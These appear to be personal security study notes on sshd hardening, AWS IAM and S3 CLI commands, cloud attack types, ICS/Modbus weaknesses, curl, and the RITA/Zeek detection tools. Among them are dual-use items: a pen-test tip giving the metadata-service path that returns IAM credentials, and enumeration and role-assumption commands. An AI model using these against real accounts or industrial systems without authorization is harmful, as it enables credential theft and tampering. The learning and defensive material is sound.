sshd_config (Server): The "Daemon" configuration. Controls security policies like PermitRootLogin or MaxAuthTries.

sshd

sshd (Secure Shell Daemon) is the server-side software process that listens for incoming SSH connections. While ssh is the tool you use to connect out, sshd is the "gatekeeper" waiting on the server to handle those requests.

Architectural Role

sshd operates as a Master Process that typically runs with root privileges. Its primary lifecycle looks like this:

Listen: It sits on a network socket (default TCP Port 22).
Fork: When a connection request arrives, the master process forks a dedicated Child Process.
Privilege Separation: The child process handles the specific session. Modern sshd uses "Privilege Separation," where the code that handles unauthenticated network data runs as an unprivileged user to minimize the impact of potential exploits.

Core Configuration (`sshd_config`)

The daemon is managed by a configuration file located at /etc/ssh/sshd_config.

Note: Do not confuse this with ssh_config, which is for the client.

| Directive | Technical Purpose | Recommended Setting | | ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------ | | Port | The TCP port the daemon binds to. | 22 (or a high port to reduce bot spam) | | PermitRootLogin | Controls if the root user can log in via SSH. | no or prohibit-password | | PasswordAuthentication | Whether to allow standard passwords. | no (forces SSH keys) | | MaxAuthTries | Limits login attempts before dropping the connection. | 3 | | AllowUsers | An Account Whitelist; only specified users can log in. | user1 user2 | | KexAlgorithms | Restricts the Key Exchange to specific algorithms. | curve25519-sha256@libssh.org | | Ciphers | Specifies the Symmetric Encryption used for the session data. It removes legacy ciphers like 3DES or Blowfish. | chacha20-poly1305@openssh.com,aes256-gcm@openssh.com | | PubkeyAuthentication | Enables the SSH-USERAUTH layer to accept digital signatures. The server will attempt to match a client's private key signature against the entries in the authorized_keys file. | yes |

Management Commands

To manage the sshd service on modern Linux systems, you use systemctl:

Start sshd: systemctl start sshd
Check Status: systemctl status sshd
Restart (Apply Changes): systemctl restart sshd
Syntax Check: sshd -t
- Always run this before restarting! It tests your config file for errors so you don't accidentally lock yourself out of a remote server with a broken configuration.

Logging and Security

sshd sends its event logs to the system logger (syslog). You can monitor authentication attempts in real-time:

Debian/Ubuntu: tail -f /var/log/auth.log
RHEL/CentOS/Fedora: tail -f /var/log/secure

Intrusion Prevention: Because sshd is a high-value target, it is often paired with Fail2Ban, which parses these logs and uses iptables or nftables to automatically block IP addresses that show brute-force behavior.

The Protocol Stack

The SSH protocol is logically divided into three hierarchical layers that sit on top of TCP/IP.

Transport Layer (SSH-TRANS): * Role: Handles initial connection, server authentication, and session security.
- Components: Negotiation of encryption ciphers (AES, ChaCha20), key exchange (Diffie-Hellman), and MAC (Message Authentication Code) algorithms to ensure data integrity.
- Perfect Forward Secrecy (PFS): Ensures that if a server's long-term host key is compromised in the future, past session data remains encrypted.
User Authentication Layer (SSH-USERAUTH):
- Role: Authenticates the client to the server.
- Components: Processes the methods we discussed earlier (Public Key, Password, Keyboard-interactive). It runs "on top" of the secure transport layer.
Connection Layer (SSH-CONNECT):
- Role: The "multiplexer." It allows a single encrypted connection to be split into multiple logical Channels.
- Components: Individual channels for interactive shells, exec commands, SFTP transfers, and port forwarding.

Subsystems

SSH isn't just for a terminal; it acts as a wrapper for other "subsystems" that provide specific features.

| Subsystem | Technical Description | Common Tool | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------- | ------------------- | | SFTP | SSH File Transfer Protocol. A full-featured file manipulation protocol (list, delete, resume) that runs over an SSH channel. | sftp or FileZilla | | SCP | Secure Copy Protocol. A lightweight, non-interactive method for pushing/pulling files. | scp | | X11 Forwarding | Encapsulates graphical window data (X Window System) so you can run GUI apps on a remote server and see them on your local desktop. | ssh -X |

[Vault: System Security] AWS

Sun, 28 Dec 2025 17:04:18 GMT

Amazon Web Services (AWS) is a comprehensive cloud computing platform offered by Amazon. It provides a wide range of services such as computing power, storage, databases, networking, analytics, and more, delivered over the internet on a pay-as-you-go basis.

AWS CLI

The AWS Command Line Interface is a unified tool to manage your AWS services.

AWS accounts can be accessed programmatically by using an Access Key ID and a Secret Access Key.

Amazon Security Token Service (STS) allows us to utilise the credentials of a user that we have saved during our AWS CLI configuration. We can use the get-caller-identity call to retrieve information about the user we have configured for the AWS CLI : aws sts get-caller-identity

AWS IAM

Amazon Web Services utilises the Identity and Access Management (IAM) service to manage users and their access to various resources, including the actions that can be performed against those resources. Therefore, it is crucial to ensure that the correct access is assigned to each user according to the requirements. Misconfiguring IAM has led to several high-profile security incidents in the past, giving attackers access to resources they were not supposed to access.

IAM Users

A user represents a single identity in AWS. Each user has a set of credentials, such as passwords or access keys, that can be used to access resources. Furthermore, permissions can be granted at a user level, defining the level of access a user might have.

IAM Groups

Multiple users can be combined into a group. This can be done to ease the access management for multiple users. For example, in an organisation employing hundreds of thousands of people, there might be a handful of people who need write access to a certain database. Instead of granting access to each user individually, the admin can grant access to a group and add all users who require write access to that group. When a user no longer needs access, they can be removed from the group.

IAM Roles

An IAM Role is a temporary identity that can be assumed by a user, as well as by services or external accounts, to get certain permissions.

IAM Policies

Access provided to any user, group or role is controlled through IAM policies. A policy is a JSON document that defines the following:

What action is allowed (Action)
On which resources (Resource)
Under which conditions (Condition)
For whom (Principal) Policies can be inline or attached. Inline policies are assigned directly in the user (or group/role) profile and hence will be deleted if the identity is deleted. These can be considered as hard-coded policies as they are hard-coded in the identity definitions. Attached policies, also called managed policies, can be considered reusable. An attached policy requires only one change in the policy, and every identity that policy is attached to will inherit that change automatically.

Using aws iam in aws cli:

enumerating users : aws iam list-users
list user's inline policies : aws iam list-user-policies --user-name <UserName>
list user's attached policies : aws iam list-attached-user-policies --user-name <UserName>
get user's policy details : aws iam get-user-policy --policy-name <POLICYNAME> --user-name <UserName>
list roles : aws iam list-roles
list role's inline policies : aws iam list-role-policies --role-name <RoleName>
list role's inline policies : aws iam list-attached-role-policies --role-name <RoleName>
get role policy details : aws iam get-role-policy --role-name <RoleName> --policy-name <POLICYNAME>

To assume a role we can use AWS STS to obtain the temporary credentials

aws sts assume-role --role-arn <RoleARN> --role-session-name <SESSIONNAME> This command will ask STS, the service in charge of AWS security tokens, to generate a temporary set of credentials to assume the specified role. The temporary credentials will be referenced by the session-name (you can set any name you want for the session).

The output will provide us the credentials we need to assume this role, specifically the AccessKeyID, SecretAccessKey and SessionToken. To be able to use these, run the following commands in the terminal, replacing with the exact credentials that you received on running the assume-role command.

user@machine$ export AWS_ACCESS_KEY_ID="ASIAxxxxxxxxxxxx"  
user@machine$ export AWS_SECRET_ACCESS_KEY="abcd1234xxxxxxxxxxxx"  
user@machine$ export AWS_SESSION_TOKEN="FwoGxxxxxx"

Once we have done that, we can officially use the permissions granted by the specified role. To check if you have correctly assumed the role, run: aws sts get-caller-identity

S3

Amazon S3 stands for Simple Storage Service. It is an object storage service provided by Amazon Web Services that can store any type of object such as images, documents, logs and backup files in a scalable and reliable way. Companies often use S3 to store data for various reasons, such as reference images for their website, documents to be shared with clients, or files used by internal services for internal processing. Data is stored on buckets, which act as a folder in the cloud where you can store files, applications, backup information or anything you need.

Listing Contents From a Bucket : aws s3api list-buckets
check out the contents of bucket : aws s3api list-objects --bucket <bucketname>
copy a file from a bucket to our local machine : aws s3api get-object --bucket <bucketname> --key <cloudfilename> <local_filename>

ARN => Amazon Resource Name

[Vault: System Security] Cloud Security

Sun, 28 Dec 2025 17:04:18 GMT

Many organizations are moving to the cloud or deploying hybrid solutions to host their applications. Organizations moving to the cloud are almost always looking to transition from capital expenditure (CapEx) to operating expenditure (OpEx). Most Fortune 500 companies operate in a multicloud environment. It is obvious that cloud computing security is more important today than ever before. Cloud computing security includes many of the same functionalities as traditional IT security, including protecting critical information from theft, data exfiltration, and deletion, as well as privacy.

The National Institute of Standards and Technology (NIST) authored Special Publication (SP) 800-145, “The NIST Definition of Cloud Computing,” to provide a standard set of definitions for the different aspects of cloud computing. The SP 800-145 document also compares the different cloud services and deployment strategies. The advantages of using a cloud-based service include the following:

Distributed storage
Scalability
Resource pooling
Access from any location
Measured service
Automated management

Characteristics of cloud computing

According to NIST, the essential characteristics of cloud computing include the following:

On-demand self-service
Broad network access
Resource pooling
Rapid elasticity
Measured service

Models of cloud computing

Cloud deployment models include the following:

Public cloud: Open for public use
Private cloud: Used just by the client organization on premises or at a dedicated area in a cloud provider
Community cloud: Shared between several organizations
Hybrid cloud: Composed of two or more clouds (including on-prem services)

Cloud computing can be broken into the following three basic models:

Infrastructure as a Service (IaaS)

IaaS is a cloud solution in which you rent infrastructure. You purchase virtual power to execute your software as needed. This is much like running a virtual server on your own equipment, except that you run a virtual server on a virtual disk. IaaS is similar to a utility company model in that you pay for what you use.

Platform as a Service (PaaS)

PaaS provides everything except applications. Services provided by this model include all phases of the systems development life cycle (SDLC) and can use application programming interfaces (APIs), website portals, or gateway software. These solutions tend to be proprietary, which can cause problems if the customer moves away from the provider’s platform.

Software as a Service (SaaS)

SaaS is designed to provide a complete packaged solution. The software is rented out to the user. The service is usually provided through some type of front end or web portal. While the end user is free to use the service from anywhere, the company pays a per-use fee.

Cloud security challenges

All service providers do their best to deliver secure products to their customers. Much of their success depends on preventing breaches and how well they can protect sensitive information. However, since data is stored in the cloud and accessed over the internet, several challenges arise:

Misconfiguration is one of the biggest concerns. Customers of cloud-based services are responsible for configuring their own security environment. Oftentimes, they use out-of-the-box configurations that fail to address their specific security objectives.
Cloud-native breaches are more likely to occur due to misconfigured services.
Monitoring access might be difficult depending on the client and level of service.
Meeting regulatory standards is also a concern, particularly in industries that are required by law to follow specific requirements such as HIPAA, PCI DSS, and GDPR.

Attacks on Cloud

Many attacks against cloud technologies are possible, and the following are just some of them:

Credential harvesting

Credential harvesting is not a new attack type, but the methodologies used by attackers have evolved throughout the years. Credential harvesting (or password harvesting) is the act of gathering and stealing valid usernames, passwords, tokens, PINs, and any other types of credentials through infrastructure breaches. One of the most common ways that attackers perform credential harvesting is by using phishing and spear phishing emails with links that could redirect a user to a bogus site. This “fake site” could be made to look like a legitimate cloud service, such as Gmail, Office 365, or even a social media site such as Twitter, LinkedIn, Instagram, or Facebook. This is why it is so important to use multifactor authentication. However, in some cases, attackers could bypass multifactor authentication by redirecting the user to a malicious site and stealing a session cookie from the user’s browser.

Many cloud services and cloud-hosted applications use single sign-on (SSO), and others use federated authentication. Sometimes cloud-based applications allow you to log in with your Google, Apple, or Facebook credentials. Attackers could redirect users to impersonated websites that may look like legitimate Google, Apple, Facebook, or Twitter login pages. From there, the attacker could steal the victim’s username and password.

[[Social-Engineer Toolkit (SET)]] Attackers have been known to harvest cloud service provider credentials once they get into their victims’ systems. Different threat actors have extended their credential harvesting capabilities to target multiple cloud and non-cloud services in victims’ internal networks and systems after the exploitation of other vulnerabilities.

Privilege escalation

Privilege escalation is the act of exploiting a bug or design flaw in a software or firmware application to gain access to resources that normally would have been protected from an application or a user. This results in a user gaining additional privileges beyond what the application developer originally intended (for example, a regular user gaining administrative control or a particular user being able to read another user’s email without authorization).

The original developer does not intend for the attacker to gain higher levels of access but probably doesn’t enforce a need-to-know policy properly and/or hasn’t validated the code of the application appropriately. Attackers take advantage of this to gain access to protected areas of operating systems or to applications (for example, reading another user’s email without authorization). Buffer overflows are used on Windows computers to elevate privileges as well. To bypass digital rights management (DRM) on games and music, attackers use a method known as jailbreaking, which is another type of privilege escalation, most commonly found on Apple iOS-based mobile devices. Malware also attempts to exploit privilege escalation vulnerabilities, if any exist on the system. Privilege escalation can also be attempted on network devices. Generally, the fix for this is simply to update the device and to check for updates on a regular basis.

The following are a couple different types of privilege escalation:

Vertical Privilege Escalation

This type of privilege escalation, also called privilege elevation, occurs when a lower-privileged user accesses functions reserved for higher-privileged users (for example, a standard user accessing functions of an administrator). To protect against this situation, you should update the network device firmware. In the case of an operating system, it should again be updated. The use of some type of access control system – for example, User Account Control (UAC)–is also advisable.

Horizontal Privilege Escalation

This type of privilege escalation occurs when a normal user accesses functions or content reserved for other normal users (for example, one user reading another’s email). This can be done through hacking or by a person walking over to someone else’s computer and simply reading their email. Always have your users lock their computer (or log off) when they are not physically at their desk.

Account takeover

The underlying mechanics and the attacker motive of a cloud account takeover attack are the same as for an account takeover that takes place on premises. In an account takeover, the threat actor gains access to a user or application account and uses it to then gain access to more accounts and information. There are different ways that an account takeover can happen in the cloud. The impact that an account takeover has in the cloud can also be a bit different from the impact of an on-premises attack. Some of the biggest differences are the organization’s ability to detect a cloud account takeover, find out what was impacted, and determine how to remediate and recover. There are a number of ways to detect account takeover attacks. Select each for more detail.

Login location

The location of the user can clue you in to a takeover. For instance, you may not do business in certain geographic locations and countries. You can prevent a user from logging in from IP addresses that reside in those locations. Keep in mind, however, that an attacker can easily use a VPN to bypass this restriction.

Failed login attempts

It is now fairly easy to detect and block failed login attempts from a user or an attacker.

Lateral phishing emails

These are phishing emails that originate from an account that has already been compromised by the attacker.

Malicious OAuth, SAML, or OpenID Connect connections

An attacker could create a fake application that could require read, write, and send permissions for email SaaS offerings such as Office 365 and Gmail. Once the application is granted permission by the user to “connect” and authenticate to these services, the attacker could manipulate it.

Abnormal file sharing and downloading

You might suspect an account takeover attack if you notice that a particular user is suddenly sharing or downloading a large number of files.

Metadata service attacks

Traditionally, software developers used hard-coded credentials to access different services, such as databases and shared files on an FTP server. To reduce the exposure of such insecure practices, cloud providers (such as Amazon Web Services) have implemented metadata services. When an application requires access to specific assets, it can query the metadata service to get a set of temporary access credentials. This temporary set of credentials can then be used to access services such as AWS Simple Cloud Storage (S3) buckets and other resources. In addition, these metadata services are used to store the user data supplied when launching a new virtual machine (VM) – such as an Amazon Elastic Compute Cloud or AWS EC2 instance – and configure the application during instantiation.

As you can probably already guess, metadata services are some of the most attractive services on AWS for an attacker to access. If you are able to access these resources, at the very least, you will get a set of valid AWS credentials to interface with the API. Software developers often include sensitive information in user startup scripts. These user startup scripts can be accessed through a metadata service and allow AWS EC2 instances (or similar services with other cloud providers) to be launched with certain configurations. Sometimes startup scripts even contain usernames and passwords used to access various services.

By using tools such as nimbostratus (https://github.com/andresriancho/nimbostratus), you can find vulnerabilities that could lead to metadata service attacks. TIP When you are pen testing a web application, look for functionality that fetches page data and returns it to the end user (similar to the way a proxy would). The metadata service doesn’t require any particular parameters. If you access the URL https://x.x.x.x/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE, it will return the AccessKeyID, SecretAccessKey, and Token values you need to authenticate into the account.

Attacks against misconfigured cloud assets

Attackers can leverage misconfigured cloud assets in a number of ways. Select each for more information.

Identity and Access Management (IAM) Implementations

IAM solutions are used to administer user and application authentication and authorization. Key IAM features include SSO, multifactor authentication, and user provisioning and life cycle management. If an attacker is able to manipulate a cloud-based IAM solution in an IaaS or PaaS environment, it could be catastrophic for the cloud consumer (that is, the organization developing, deploying, and consuming cloud applications).

Federation Misconfigurations

Federated authentication (or federated identity) is a method of associating a user’s identity across different identity management systems. For example, every time you access a website, a web application, or a mobile application that allows you to log in or register with your Facebook, Google, or Twitter account, that application is using federated authentication. Often application developers misconfigure the implementation of the underlying protocols used in a federated identity environment (such as SAML, OAuth, and OpenID). For instance, a SAML assertion–that is, the XML document the identity provider sends to the service provider that contains the user authorization–should contain a unique ID that is accepted only once by the application. If you do not configure your application this way, an attacker could replay a SAML message to create multiple sessions. Attackers could also change the expiration date on an expired SAML message to make it valid again or change the user ID to a different valid user. In some cases, an application could grant default permissions or higher permissions to an unmapped user. Subsequently, if an attacker changes the user ID to an invalid user, the application could be tricked into giving access to the specific resource. In addition, your application might use security tokens like the JSON Web Token (JWT) and SAML assertions to associate permissions from one platform to another. An attacker could steal such tokens and leverage misconfigured environments to access sensitive data and resources.

Object Storage

Insecure permission configurations for cloud object storage services, such as Amazon’s AWS S3 buckets, are often the cause of data breaches.

Containerization Technologies

Attacks against container-based deployments (such as Docker, Rocket, LXC, and containerd) have led to massive data breaches. For instance, you can passively obtain information from Shodan (shodan.io) or run active recon scans to find cloud deployments widely exposing the Docker daemon or Kubernetes elements to the Internet. Often attackers use stolen credentials or known vulnerabilities to compromise cloud-based applications. Similarly, attackers use methods such as typosquatting to create malicious containers and post them in Docker Hub. This attack, which can be considered a supply chain attack, can be very effective. You could, for example, download the base image for NGINX or Apache HTTPd from Docker Hub, and that Docker image might include a backdoor that the attacker can use to manipulate your applications and underlying systems.

Resource exhaustion and denial-of-service (DoS) attacks

One of the benefits of leveraging cloud services is the distributed and resilient architecture that most leading cloud providers offer. This architecture helps minimize the impact of a DoS or distributed denial-of-service (DDoS) attack compared to what it would be if you were hosting your application on premises in your data center. On the other hand, in recent years, the volume of bits per second (bps), packets per second (pps), and HTTP(s) requests per second (rps) have increased significantly. Often attackers use botnets of numerous compromised laptops and desktop systems and compromise mobile, IoT, and cloud-based systems to launch these attacks. Figure 7-3 illustrates the key metrics used to identify volumetric DDoS attacks. However, attackers can launch more strategic DoS attacks against applications hosted in the cloud that could lead to resource exhaustion. For example, they can leverage a single-packet DoS vulnerability in network equipment used in cloud environments, or they can leverage tools to generate crafted packets to cause an application to crash. For instance, you can search in Exploit Database (exploit-db.com) for exploits that can be used to leverage “denial of service” vulnerabilities, where an attacker could just send a few packets and crash an application or the whole operating system.

Another example of a DoS attack that can affect cloud environments is the direct-to-origin (D2O) attack. In a D2O attack, threat actors are able to reveal the origin network or IP address behind a content delivery network (CDN) or large proxy placed in front of web services in a cloud provider. A D2O attack could allow attackers to bypass different anti-DDoS mitigations.

NOTE A CDN is a geographically distributed network of proxies in data centers around the world that offers high availability and performance benefits by distributing web services to end users around the world.

Cloud malware injection attacks

Cloud deployments are susceptible to malware injection attacks. In a cloud malware injection attack, the attacker creates a malicious application and injects it into a SaaS, PaaS, or IaaS environment. Once the malware injection is completed, the malware is executed as one of the valid instances running in the cloud infrastructure. Subsequently, the attacker can leverage this foothold to launch additional attacks, such as covert channels, backdoors, eavesdropping, data manipulation, and data theft.

Side-channel attacks

Side-channel attacks are often based on information gained from the implementation of the underlying computer system (or cloud environment) instead of a specific weakness in the implemented technology or algorithm. For instance, different elements – such as computing timing information, power consumption, electromagnetic leaks, and even sound – can provide detailed information that can help an attacker compromise a system. The attacker aims to gather information from or influence an application or a system by measuring or exploiting indirect effects of the system or its hardware. Most side-channel attacks are used to exfiltrate credentials, cryptographic keys, and other sensitive information by measuring coincidental hardware emissions.

Side-channel attacks can be used against VMs and in cloud computing environments where a compromised system controlled by the attacker and target share the same physical hardware.

Examples of vulnerabilities that could lead to side-channel attacks are the Spectre and Meltdown vulnerabilities affecting Intel, AMD, and ARM processors. Cloud providers that use Intel CPUs in their virtualized solutions could be affected by these vulnerabilities if they do not apply the appropriate patches. You can find information about Spectre and Meltdown at https://spectreattack.com.

Direct-to-origin attacks

Software development kits (SDKs) and cloud development kits (CDKs) can provide great insights about cloud-hosted applications, as well as the underlying infrastructure. An SDK is a collection of tools and resources to help with the creation of applications (on premises or in the cloud). SDKs often include compilers, debuggers, and other software frameworks.

CDKs, on the other hand, help software developers and cloud consumers deploy applications in the cloud and use the resources that the cloud provider offers. For example, the AWS Cloud Development Kit (AWS CDK) is an open-source software development framework that cloud consumers and AWS customers use to define cloud application resources using familiar programming languages.

NOTE The following site provides detailed information on how to get started with the AWS CDK: https://docs.aws.amazon.com/cdk/latest/guide/getting_started.html.

Cloud security is one of the fastest growing subfields of cybersecurity. There are a variety of resources available online to learn more about this specialized topic.

Omar Santos has included several tools that can be used to scan insecure S3 buckets at my GitHub repository, at https://github.com/The-Art-of-Hacking/h4cker/tree/master/cloud_resources.
The U.K.’s National Cyber Security Centre has a detailed guide for choosing, using, and deploying cloud services securely based on the shared responsibility model.
The Cloud Security Alliance® is an organization dedicated to creating secure cloud environments. They offer access to cloud security-specific research, certification, and products to users with a paid membership.

[Vault: System Security] ICS

Sun, 28 Dec 2025 17:04:18 GMT

ICS denotes systems responsible for overseeing and conducting functions that support critical infrastructure, such as water, power, transportation, and manufacturing.

SCADA (Supervisory Control and Data Acquisition)

SCADA systems are the "command centres" of industrial operations. They act as the bridge between human operators and the machines doing the work. Think of SCADA as the nervous system of a factory—it senses what's happening, processes that information, and sends commands to make things happen.

Components of a SCADA System

A SCADA system typically consists of four key components:

Sensors & Actuators: The physical interface. Sensors measure real-world conditions (temperature, weight, position), while actuators perform physical actions (moving motors, opening valves).
PLCs (Programmable Logic Controllers): The "brains" of the operation. These are ruggedized industrial computers that execute automation logic by reading sensor data and sending commands to actuators in real-time.
Monitoring Systems (HMI): Visual interfaces like dashboards, alarm panels, and CCTV feeds that allow human operators to observe processes.
Historians: Specialized databases that record all operational data over time for troubleshooting and auditing.

Why SCADA Systems Are Targeted

Industrial control systems, such as SCADA, have become increasingly attractive targets for cybercriminals and nation-state actors. Here's why:

They often run legacy software with known vulnerabilities. Many SCADA systems were installed decades ago and never updated. Security patches that exist for modern software don't exist for these ageing systems.
Default credentials are commonly left unchanged. Administrators prioritise keeping systems running over changing passwords. In industrial environments, the mentality is often "if it works, don't touch it"—a recipe for security disasters.
They're designed for reliability, not security. Most SCADA systems were built before cyber security was a significant concern. They were intended for closed networks that were presumed safe. Authentication, encryption, and access controls were afterthoughts at best.
They control physical processes. Unlike attacking a website or stealing data, compromising SCADA systems has real-world consequences. Attackers can cause blackouts, contaminate water supplies, or—in our case—sabotage Christmas deliveries.
They're often connected to corporate networks. The myth of "air-gapped" industrial systems is largely fiction. Most SCADA systems connect to business networks for reporting, remote management, and data integration. This connectivity provides attackers with entry points.
Protocols like Modbus lack authentication. Many industrial protocols were designed for trusted environments. Anyone who can reach the Modbus port (502) can read and write values without proving their identity. In early 2024, the first ICS/OT malware, FrostyGoop, was discovered. The malware can directly interface with industrial control systems via the Modbus TCP protocol, enabling arbitrary reads and writes to device registers over TCP port 502.

PLC

A PLC (Programmable Logic Controller) is an industrial computer designed to control machinery and processes in real-world environments. Unlike your laptop or smartphone, PLCs are purpose-built machines engineered for extreme reliability and harsh conditions.

PLCs are designed to:

Survive harsh environments - They operate flawlessly in extreme temperatures, constant vibration, dust, moisture, and electromagnetic interference. A PLC controlling warehouse robotics might endure freezing temperatures in winter storage areas and scorching heat near packaging machinery.
Run continuously without failure - PLCs operate 24/7 for years, sometimes decades, without rebooting. Industrial facilities can't afford downtime for software updates or system restarts. When a PLC starts running, it's expected to keep running indefinitely.
Execute control logic in real-time - PLCs respond to sensor inputs within milliseconds. When a package reaches the end of a conveyor belt, the PLC must instantly activate the robotic arm to catch it. These timing requirements are critical for safety and efficiency.
Interface directly with physical hardware - PLCs connect directly to sensors (measuring temperature, pressure, position, weight) and actuators (motors, valves, switches, robotic arms). They speak the electrical language of industrial machinery.

Modbus

Modbus is the communication protocol that industrial devices use to talk to each other. Created in 1979 by Modicon (now Schneider Electric), it's one of the oldest and most widely deployed industrial protocols in the world. Its longevity isn't due to sophisticated features—quite the opposite. Modbus succeeded because it's simple, reliable, and works with almost any device.

Think of Modbus as a basic request-response conversation:

Client (your computer): "PLC, what's the current value of register 0?"
Server (the PLC): "Register 0 currently holds the value 1." This simplicity makes Modbus easy to implement and debug, but it also means security was never a consideration. There's no authentication, no encryption, no authorisation checking. Anyone who can reach the Modbus port can read or write any value.

Modbus Data Types

Modbus organises data into four distinct types, each serving a specific purpose in industrial automation:

|Type|Purpose|Values|Example Use Cases| |---|---|---|---| |Coils|Digital outputs (on/off)|0 or 1|Motor running? Valve open? Alarm active?| |Discrete Inputs|Digital inputs (on/off)|0 or 1|Button pressed? Door closed? Sensor triggered?| |Holding Registers|Analogue outputs (numbers)|0-65535|Temperature setpoint, motor speed, zone selection| |Input Registers|Analogue inputs (numbers)|0-65535|Current temperature, pressure reading, flow rate|

The distinction between inputs and outputs is important. Coils and Holding Registers are writable—you can change their values to control the system. Discrete Inputs and Input Registers are read-only—they reflect sensor measurements that you observe but cannot directly modify.

Remember that crumpled note you found earlier? Now it makes complete sense. The maintenance technician was documenting these exact Modbus addresses and their meanings!

Modbus Addressing

Each data point in Modbus has a unique address—think of it like a house number on a street. When you want to read or write a specific value, you reference it by its address number.

Critical detail: Modbus addresses start at 0, not 1. This zero-indexing catches many beginners off guard. When documentation mentions "Register 0," it literally means the first register, not the second.

Modbus TCP vs Serial Modbus

Originally, Modbus operated over serial connections using RS-232 or RS-485 cables. Devices were physically connected in a network, and this physical isolation provided a degree of security—you needed physical access to the wiring to intercept or inject commands.

Modern industrial systems use Modbus TCP, which encapsulates the Modbus protocol inside standard TCP/IP network packets. Modbus TCP servers listen on port 502 by default.

This network connectivity brings enormous benefits—remote monitoring, easier integration with business systems, and centralised management. But it also exposes these historically isolated systems to network-based attacks.

The Security Problem

Modbus has no built-in security mechanisms:

No authentication: The protocol doesn't verify who's making requests. Any client can connect and issue commands.
No encryption: All communication happens in plaintext. Anyone monitoring network traffic can see exactly what values are being read or written.
No authorisation: There's no concept of permissions. If you can connect, you can read and write anything.
No integrity checking: Beyond basic checksums for transmission errors, there's no cryptographic verification that commands haven't been tampered with.

Modern security solutions exist—VPNs, firewalls, Modbus security gateways—but they're add-ons, not part of the protocol itself. Many industrial facilities haven't implemented these protections, either due to cost concerns, compatibility issues with legacy equipment, or a simple lack of awareness.

Modbus Reconnaissance

Using pymodbus python library.

[Vault: Tools] curl

Sun, 28 Dec 2025 17:04:18 GMT

curl is a tool for transferring data from or to a server using URLs. It supports these protocols: DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET, TFTP, WS and WSS.

Basic Request: You can use the command below to make a basic request to a website.

curl https://example.com

Choosing a Path: If you wish to view a different website path, you can use the command below.

curl https://example.com/endpoint_1

Query Strings: As we learned earlier in the module, arguments can be passed to a web application using query strings. You can try this using the command below.

curl https://example.com/endpoint_2?show=flag

Method Type: You can change your method by using the -X switch.

curl -X POST https://example.com/endpoint_3

Post Data: We can send data to the web application using the -d switch.

curl -X POST https://example.com/endpoint_4 -d "show=flag"

Headers: You can set headers can be achieved by using the -H switch.

curl https://example.com/endpoint_5 -H "Show: flag"

To specify a custom user-agent, we can use the -A flag: curl -A "internalcomputer" http://example.com Cookies: You can set cookies using two different methods; as cookies are technically a header, you can use something similar to the above example:

curl https://example.com/endpoint_6 -H "Cookie: show=flag"

Or by using the proper -b switch that curl reserves for setting cookies.

curl https://example.com/endpoint_6 -b "show=flag"

To save cookies use -c flag.

curl -c cookies.txt -d "username=admin&password=admin" http://example.com/session.php

and then to use it: curl -b cookies.txt http://example.com/session.php

URL Encoding:

Some characters in requests are reserved for letting the web server know where data starts and ends, such as the & and = characters.

For example, if you wanted to set the field show to have the value fl&ag, this would confuse the webserver as it would think show has the value fl, and then the & character is signifying the start of the next field.

You can circumvent this by URL encoding special characters. This looks like a percent sign (%) followed by two hexadecimal digits, and these digits represent the character's value in the ASCII character set (https://www.w3schools.com/charsets/ref_html_ascii.asp).

So to properly make the request, we'd use the example below.

curl https://example.com/endpoint_7?show=fl%26ag

Authorization:

Websites that require authorization can have a username and password passed to them in two methods, either by using the -u switch:

curl -u admin:password https://example.com/endpoint_8

Or by using the Authorization header. In this example, the username and password is concatenated together using a colon and then encoded using base64.

curl https://example.com/endpoint_8 -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="

Other

Silent request (No headers): curl -s website.com Include headers in response : curl -i website.com

[Vault: Tools] RITA

Fri, 26 Dec 2025 11:34:37 GMT

Real Intelligence Threat Analytics (RITA) is an open-source framework created by Active Countermeasures. Its core functionality is to detect command and control (C2) communication by analyzing network traffic captures and logs. Its primary features are:

C2 beacon detection
DNS tunneling detection
Long connection detection
Data exfiltration detection
Checking threat intel feeds
Score connections by severity
Show the number of hosts communicating with a specific external IP
Shows the datetime when the external host was first seen on the network

The magic behind RITA is its analytics. It correlates several captured fields, including IP addresses, ports, timestamps, and connection durations, among others. Based on the normalized and correlated dataset, RITA runs several analysis modules collecting information like:

Periodic connection intervals
Excessive number of DNS queries
Long FQDN
Random subdomains
Volume of data over time over HTTPS, DNS, or non-standard ports
Self-signed or short-lived certificates
Known malicious IPs by cross-referencing with public threat intel feeds or blocklists

RITA only accepts network traffic input as Zeek logs.

Zeek

Zeek is an open-source network security monitoring (NSM) tool.

https://docs.zeek.org/en/master/index.html Zeek (formerly Bro) is the world's leading platform for network security monitoring. Flexible, open source, and powered by defenders. Zeek is not a firewall or IPS/IDS; it does not use signatures or specific rules to take an action. It simply observes network traffic via configured SPAN ports (used to copy traffic from one port to another for monitoring), physical network taps, or imported packet captures in the PCAP format. Zeek then analyzes and converts this input into a structured, enriched output. This output can be used in incident detection and response, as well as threat hunting. Out of the box, Zeek covers two of the four types of NSM data: transaction data (summarized records of application-layer transactions) and extracted content data (files or artifacts extracted, such as executables).

[!tip] A SPAN port (sometimes called a mirror port) is a software feature built into a switch or router that creates a copy of selected packets passing through the device and sends them to a designated SPAN port. Using software, the administrator can easily configure or change what data is to be monitored. Since the primary purpose of a switch or router is to forward production packets, SPAN data is given a lower priority on the device. The SPAN also uses a single egress port to aggregate multiple links, so it is easily oversubscribed.

convert packet captures (PCAPs) into structured logs: zeek readpcap <pcapfile> <outputdirectory>
- zeek will convert this pcap to multiple zeek log files based on log types.
- like capture_loss.log dns.log http.log known_services.log notice.log packet_filter.log software.log stats.log x509.log conn.log files.log known_hosts.log loaded_scripts.log ocsp.log reporter.log ssl.log weird.log
- know more about different type of log files here.

Analysis using RITA

Enter the below command for RITA to import the zeek logs. After importing it will parse and analyze the logs. rita import --logs <zeek logs dir> --database <db-name> After RITA has parsed and analyzed our data, we can view the results by entering the command rita view <db-name>

After entering the command, we can see a structured terminal window with the results. The terminal window shows three elements: the search bar, the results pane, and a details pane. ![[attachments/RITA-1766600448420.png]] Search bar
